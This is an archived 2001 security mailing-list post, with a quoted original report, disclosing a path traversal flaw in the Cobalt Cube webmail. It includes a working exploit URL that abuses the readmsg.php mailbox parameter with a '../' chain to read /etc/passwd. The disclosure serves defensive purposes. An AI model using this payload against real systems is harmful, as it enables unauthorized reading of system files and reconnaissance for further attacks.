I confirmed this on Cobalt's, now Sun, Cube III. Paul Marshall wrote: > > At 08:41 05/07/2001, you wrote: > I just got a new Cobalt Cube today and I have been poking around at it > for security issues... I noticed this minor issue in the webmail system. > Your > users are not aloud to have shell access by default however if they > malform their mailbox requests they can read local files with the perms > of the webserver. If your users have shell access they will not really > be gaining anything however this could be used to remotely gather > information for a future attack. > > [admin admin]$ uname -a > Linux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586 unknown > [admin admin]$ cat /etc/issue > > Cobalt Linux release 6.0 (Carmel) > Kernel 2.2.16C7 on an i586 > > http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../ > ../../../../../../../../etc/passwd&id=1 > > -KF -- The events which transpired five thousand years ago; Five years ago or five minutes ago, have determined what will happen five minutes from now; five years From now or five thousand years from now. All history is a current event. - Dr John Henrik Clake -
This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 00:58:59 PDT